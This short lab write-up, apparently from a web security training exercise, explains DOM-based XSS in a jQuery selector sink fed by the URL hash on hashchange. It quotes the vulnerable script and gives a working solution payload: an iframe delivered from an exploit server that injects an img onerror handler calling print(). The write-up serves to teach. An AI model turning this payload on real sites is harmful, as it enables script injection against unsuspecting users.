Lab: DOM XSS in jQuery selector sink using a hashchange event
Observe
- Open
Homepage - Right click and
Inspectthe web page. - Read the source code and we found this code using event
hashchange.
<script>
$(window).on('hashchange', function(){
var post = $('section.blog-list h2:contains(' + decodeURIComponent(window.location.hash.slice(1)) + ')');
if (post) post.get(0).scrollIntoView();
});
</script>This code means If we use section name in the URL after host, our page will be auto-scrolled to specific section based on the URL the we used. For example if we use URL https://example.xom/#Spider Web Security, when we open it, by default it will auto-scroll to the section Spider Web Security on the web page.
Solution
- Go to
Exploit Server - Set body payload using this:
<iframe src="https://example.com/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>- Deliver payload to victim